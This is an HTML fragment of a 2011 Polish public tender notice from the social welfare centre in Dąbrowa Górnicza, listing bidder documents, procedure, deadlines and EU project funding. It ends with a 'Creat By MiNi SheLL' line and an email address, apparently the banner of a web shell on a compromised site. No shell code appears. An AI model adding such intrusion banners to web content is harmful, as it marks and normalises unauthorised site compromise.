<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty (Załącznik Nr 1 do SIWZ).
2. Kalkulacja cenowa tj. wypełniony załącznik Nr 4 i załącznik 4a
3. Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy wprowadzonych aneksem w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1.Zmiany ilości poszczególnego asortymentu określonego w załączonej kalkulacji załącznik  nr 4 i 4a  w ramach maksymalnej wartości zamówienia, w sytuacji nagłej i nie przewidzianej potrzeby zmiany asortymentu w ramach zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej 
ul. Skibińskiego 1 pok. nr 17 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2011 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej 
ul. Skibińskiego 1 pok. nr 17 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 15.06.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, realizowanego przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com